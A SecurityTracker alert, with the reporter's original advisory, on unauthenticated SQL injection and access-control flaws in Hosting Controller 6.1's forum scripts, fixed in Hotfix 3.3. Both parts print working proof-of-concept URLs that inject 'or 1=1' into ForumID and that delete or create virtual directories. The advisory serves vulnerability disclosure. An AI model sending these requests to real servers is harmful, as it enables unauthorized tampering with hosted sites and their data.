Hosting Controller 'EnableForum.asp' and 'DisableForum.asp' Scripts Let Remote Users Create or Delete Forums and Virtual Directories
|
|
SecurityTracker Alert ID: 1017103
|
|
SecurityTracker URL: http://securitytracker.com/id?1017103
|
|
CVE Reference: CVE-2006-5629
, CVE-2006-5630
(Links to External Site)
|
Updated: Jun 2 2008
|
Original Entry Date: Oct 20 2006
|
Impact: Denial of service via network, Disclosure of system information, Disclosure of user information, Modification of user information, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): 6.1 Hotfix 3.2 and prior versions
|
Description: Soroush Dalili of Kapda and GSG reported several vulnerabilities in Hosting Controller. A remote user can create or delete forums and virtual directories.
The 'EnableForum.asp' and 'DisableForum.asp' scripts do not properly validate user-supplied input in the 'ForumID' parameter. A
remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. This can be exploited
to enable or delete arbitrary forums.
Some demonstration exploit URLs are provided:
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1
or 1=1
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
A remote user can also delete and create arbitrary
virtual directories.
Some demonstration exploit URLs are provided:
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test&Forum
ID=1
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test&ForumID=
The original advisory
is available at:
http://www.kapda.ir/advisory-442.html
|
Impact: A remote user can execute SQL commands on the underlying database to enable or delete forums.
A remote user can create or delete arbitrary virtual directories.
|
Solution: The vendor has issued a fix (6.1 Hotfix 3.3).
|
Vendor URL: www.hostingcontroller.com (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Windows (Any)
|
Reported By: s d <irsdl@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 20 Oct 2006 03:08:38 -0700 (PDT)
From: s d <irsdl@yahoo.com>
Subject: Hosting Controller 6.1 Hotfix <= 3.2 Multiple Vulnerabilities
|
[KAPDA::59] - Hosting Controller 6.1 Hotfix <= 3.2 Multiple Vulnerabilities
Vendor: Hosting Controller
Vendor URL: www.hostingcontroller.com
Solution: Hotfix 3.3
Found Date: 7/1/2006
Release Date: 10/10/2006
Discussion:
--------------------
UnAuthenticated user can
1- delete every sites virtual directory on hc sites
2- make forum virtual directory (with the desire name) for everysites on hc!
3- disable all hc forums by SQL Injection
4- enable all hc forums by SQL Injection
Bugs are available in "DisableForum.asp" and "enableForum.asp" in forum directory .
Exploit: (or POC)
--------------------
1- unAuthenticated user can delete every sites virtual directory on hc sites by forum!
/forum/HCSpecific/DisableForum.asp?action=disableforum&WSiteName=testsite.com&VDirName=test& ForumID=1
-----------------------------------------------------------------
2- unAuthenticated user can make forum virtual directory (with the desire name) for everysites on hc by forum!
/forum/HCSpecific/EnableForum.asp?action=enableforum&WSiteName=testsite.com&VDirName=test& ForumID=
-----------------------------------------------------------------
3- unAuthenticated user can disable all hc forums by SQL_Injection
/forum/HCSpecific/DisableForum.asp?action=disableforum&ForumID=1 or 1=1
-----------------------------------------------------------------
4- unAuthenticated user can enable all hc forums by SQL_Injection
/forum/HCSpecific/EnableForum.asp?action=enableforum&ForumID=1 or 1=1
--------------------
Solution:
--------------------
Update to version Hotfix 3.3
Original Advisory:
--------------------
http://www.kapda.ir/advisory-442.html
Credit :
--------------------
Soroush Dalili of Kapda and GSG
IRSDL [4t} kapda <d0t] ir
Kapda - Security Science Researchers Insitute [http://www.KAPDA.ir]
GSG - Grayhatz security group [http://www.Grayhatz.net]
Talk is cheap. Use Yahoo! Messenger to make PC-to-Phone calls. Great rates starting at 1¢/min.
|
|